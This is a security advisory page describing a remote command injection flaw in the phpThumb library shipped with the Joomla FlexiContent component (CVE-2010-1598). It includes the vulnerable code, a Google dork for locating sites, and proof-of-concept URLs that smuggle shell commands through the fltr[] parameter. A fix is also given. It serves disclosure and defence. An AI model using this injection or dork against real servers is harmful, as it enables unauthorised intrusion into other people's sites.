Joomla Flexicontent Remote Code Execution

2013.12.08
Credit: Deepankar Arora And Rafay Baloch
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-1598
CWE: CWE-20
Dork: inurl:com_flexicontent


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Joomla com_flexicontent Remote Code Execution # Release Date: 08/12/2013 # Author: Deepankar Arora And Rafay Baloch # Contact: http://rafayhackingarticles.net # Vendor: http://www.flexicontent.org/ # Versions Affected: 2.1.3(Latest) and earlier # Google Dork: inurl:com_flexicontent *----* *Description:* The vulnerability with phpthumb with a known vulnerability, however it has been included with com_flexicontent package. The exploit is nested in the "SafeExec" function, but the vulnerable parameter is passed to "ImageMagickThumbnailToGD". The vulnerable code is as follows: foreach ($this->fltr as $filterkey => $filtercommand) { @list($command, $parameter) = explode('|', $filtercommand, 2); switch ($command) { case 'blur': if ($this->ImageMagickSwitchAvailable('blur')) { @list($radius) = explode('|', $parameter); $radius = ($radius ? $radius : 1); $commandline .= ' -blur '.$radius; unset($this->fltr[$filterkey]); } break; $this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__); $IMresult = phpthumb_functions::SafeExec($commandline); clearstatcache(); if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) { @unlink($IMtempSourceFilename); } if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) { $this->FatalError('ImageMagick failed with message ('.trim($IMresult).')'); $this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__); Here the vulnerable parameter is fltr[] as the params passed is exploded by the pipe (|) character, and that's where the code is passed. How the command is processed: $output = array(); $lastline = $execfunction($command, $output); $returnvalue = implode("\n", $output); As we can see the $command parameter is compiled with the imagemagick path, filename and parameters. Even the phpThumbDebug parameter gives us a console like account of everything imagemagick does as it executes. *----* *POC:* *Windows- /components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg %26%26 dir %26%26 &phpThumbDebug=9 *nix- /components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l ; &phpThumbDebug=9 *----* *Fix:* Replace the phpthumb package being used with the latest version. *----* *References:* http://www.cvedetails.com/cve/CVE-2010-1598/ *----* Warm Regards, Deepankar Arora and Rafay Baloch RHA Infosec


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top